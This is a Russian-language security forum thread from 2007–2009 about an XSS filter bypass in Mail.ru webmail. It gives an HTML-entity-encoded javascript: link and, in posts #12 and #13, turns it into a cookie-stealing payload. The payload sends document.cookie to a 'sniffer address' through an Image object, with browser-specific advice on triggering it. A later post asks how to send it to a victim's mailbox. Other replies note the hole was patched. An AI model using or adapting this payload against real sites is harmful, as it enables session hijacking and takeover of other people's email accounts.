ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.08.2007, 14:30
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

2Skaret
Фишка то в том, чтоб обойти фильтр. В незашифрованном виде код такой:
<a href=javascript:alert('XSS')>Текст</a>
Но такой код не выполнится, поэтому нужен такой:
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('XSS')>Текст</a>

 
Ответить с цитированием

  #12  
Старый 15.10.2007, 03:13
mind
Участник форума
Регистрация: 26.07.2007
Сообщений: 106
Провел на форуме:
865762

Репутация: 82
По умолчанию

плин мужики помогите заюзать багу )))) пишу след код и получаю глюк в Опере:
<a href=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie;>Текст</a>
открывается новое окно и никаких куков, а если правой кнопкой мышары и открыть то куки выводятся прямо в браузере!!!
помогите разобраться )
 
Ответить с цитированием

  #13  
Старый 17.10.2007, 00:13
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100

Репутация: 2033
По умолчанию

"мужики" все в Париже, а вот Я помогу тебе разобраться.

Начнем с того, что "багу" до сих пор еще не прикрыли, это свидетельствует о степени ее опасности. При том, что обычная пассивка на мыл ру, запощенная в этот раздел, держится дай бог неделю, косвенно можно предположить, какова цена этой "свежей" "баги" (с т.зр. саппорта через призму всех отписавшихся до меня ) .

Так вот, почему ее не прикрыли... Потому что уже сравнительно давно переход по такой ссылке на мыл ру опосредуется принудительно вставляемым в тег ссылки атрибутом target c параметром "_blank". Это значит, что перед тем, как попасть в адресную строку (на выполнение), твой код &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:document.images[0].src='http://адрес сниффера/s.gif?'+document.cookie; будет помещен на новую страницу. Это все равно что самостоятельно открыть новую страницу, вписать в адресную строку этот код и ждать прихода кук ! А алерты, конечно, пойдут! Только вот, видимо, очень плохо доходит инфа, что если где-то вдруг выскочил алерт, это не значит, что найдена бага XSS.
В отличие от этого, когда ты нажимаешь правой кнопкой "открыть", браузер сам берет ссылку с псевдоскриптом и выполняет его непосредственно в контексте того домена, откуда ее взял. Атрибут target при этом игнорируется. Вот почему ты видишь свои куки в этом случае. Но в ИЕ это не проходит, а в ФФ ссылка правой кнопкой открывается только в новом окне. Остается из популярных только Опера.

Теперь мы пойдем дальше и попробуем выжать из ситуации максимум

Когда ссылка, нажатая обычным образом или через правую кнопку, открывается в новом окне, где нет никаких картинок, нет смысла обращаться к первой картинке на странице, используя document.images[0].src ! Заменям это обычным динамическим созданием объекта картинки: img=new Image(); img.src
Далее, если посмотреть исходный код открывшейся страницы (при нажатии на ссылку обычным образом), там мы увидим, что на станице отобразилось все, что идет после src= , то есть адрес твоего сниффа. Используем это, вставляя на страницу код, отсылающий куки.
XSS примет вид:
PHP код:
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a
Объясняю:
- на голую страницу помещается тег img c адресом сниффера
- но к этому адресу динамически прибавляются куки. Однако, куки разделены пробелами, в связи с чем может образоваться обрыв строки и на снифф отправится только первая кука. Мы снимаем эту проблему, преобразуя строку куки функцией escape (обратная - unescape(строка)).
- и, наконец, закрываем тег img

Обычным нажатием этот код будет работать только в ФФ.
В Опере этот код сработает, только если открыть ссылку правой кнопкой.
В ИЕ не сработает.

Письмо отправлять в штмл не с маил ру.

Посмотрим теперь, как быстро прикроют эту "багу".

Последний раз редактировалось LeverOne; 25.10.2007 в 19:53..
 
Ответить с цитированием

  #14  
Старый 18.10.2007, 01:42
mind
Участник форума
Регистрация: 26.07.2007
Сообщений: 106
Провел на форуме:
865762

Репутация: 82
По умолчанию

LeverOne, огромное тебе спасибо разобрался. к репе ++
 
Ответить с цитированием

  #15  
Старый 19.10.2007, 14:20
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию

а вот и баг прикрыли))
 
Ответить с цитированием

  #16  
Старый 25.10.2007, 12:20
ЛифчиС5СВ
Постоянный
Регистрация: 09.03.2007
Сообщений: 323
Провел на форуме:
1552920

Репутация: 369
По умолчанию

и сколько она всего прожила?
 
Ответить с цитированием

  #17  
Старый 13.11.2007, 10:03
j0nathan
Познающий
Регистрация: 13.07.2006
Сообщений: 65
Провел на форуме:
172569

Репутация: 11
По умолчанию

полюбому у них шахтёр капает на античате все дыры и закрывают потом их надо банить :d
 
Ответить с цитированием

  #18  
Старый 13.11.2007, 10:23
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию

Цитата:
Сообщение от antichat.ru  
Этот проект является попыткой показать пользователям насколько уязвимыми они являются. Что можно узнать о человеке, который просто разговаривает в чате, по ICQ, Odigo. Так же описаны проблемы анонимности и конфиденциальности при работе с сетью Internet...
Античат - прежде всего сайт по безопасности (читай название темы), а не блекхат проект. Кому надо (например mail.ru), смотрят и латают оперативно дырки. В этом суть
 
Ответить с цитированием

  #19  
Старый 15.11.2007, 20:28
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

этой багой год назад пытались мой ящик взломать, благо я всегда ява скрипты отрубаю
 
Ответить с цитированием

Обясните
  #20  
Старый 10.05.2009, 18:18
LemoTTT
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520

Репутация: 6
Smile Обясните

Давайте вы мне подробнее раскажете:
Вот код:
PHP код:
<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a
Вопрос № 1:
PHP код:
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116 
Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале Mo4x Чужие Статьи 6 19.07.2007 16:13
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ